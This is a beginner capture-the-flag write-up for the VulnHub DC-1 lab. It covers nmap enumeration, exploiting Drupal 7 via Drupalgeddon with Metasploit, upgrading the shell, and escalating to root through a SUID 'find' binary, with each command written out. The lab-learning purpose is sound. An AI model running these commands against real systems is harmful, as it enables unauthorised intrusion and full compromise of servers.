Overview
DC-1 is a beginner VulnHub machine focused on basic enumeration, exploiting an old Drupal installation, getting a shell, and escalating privileges through a misconfigured SUID binary.
The attack path was:
Drupal 7 -> Drupalgeddon -> reverse shell -> SUID find -> root
Enumeration
I started by finding the target on the local network.
Network discovery: sudo netdiscover -r 192.168.X.0/24
After finding the IP, I scanned the machine with Nmap.
Nmap scan: nmap -sC -sV -oN nmap.txt <TARGET_IP>
The useful Nmap findings were:
| Port | Service | Version / Finding |
|---|---|---|
| 80/tcp | HTTP | Apache 2.2.22 |
| 80/tcp | PHP | PHP 5.4.45 |
| 80/tcp | CMS | Drupal 7 |
Since the web server was running Drupal 7, I focused on the website first.
I confirmed the website technology with WhatWeb:
whatweb http://<TARGET_IP>
I also checked exposed Drupal files:
curl http://<TARGET_IP>/CHANGELOG.txt
This helped confirm that the Drupal version was outdated.
Exploitation
After confirming Drupal 7, I searched for known exploits.
SearchSploit: searchsploit drupal 7
The important vulnerability was SA-CORE-2014-005, also known as Drupalgeddon.
I used Metasploit to exploit it:
| Step | Command |
|---|---|
| Start Metasploit | msfconsole |
| Search for the module | search drupalgeddon |
| Select the exploit | use exploit/multi/http/drupal_drupageddon |
| Set the target | set RHOSTS <TARGET_IP> |
| Set the site path | set TARGETURI / |
| Run the exploit | run |
This gave me a shell as the web server user.
Shell Upgrade
The first shell was basic, so I upgraded it.
TTY upgrade: python -c 'import pty; pty.spawn("/bin/bash")'
Set terminal: export TERM=xterm
Then I checked my user and the system information:
whoamiiduname -a
Privilege Escalation
After getting a shell, I started local enumeration.
I looked for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
The interesting result was:
/usr/bin/find
Since find had SUID permissions, I used it to spawn a root shell:
find . -exec /bin/bash -p \; -quit
Then I confirmed root:
whoamiid
Final Flag
After getting root, I moved to the root directory and read the final flag.
Go to root folder: cd /root
Read final flag: cat thefinalflag.txt
What I Learned
DC-1 was simple, but it was useful because it connected the full attack path together.
The main idea was to enumerate properly, identify the outdated Drupal version, exploit it, then keep enumerating locally until finding a privilege escalation path.
The biggest lesson is that outdated CMS software can quickly lead to full compromise, especially when the system also has bad local permissions like SUID find.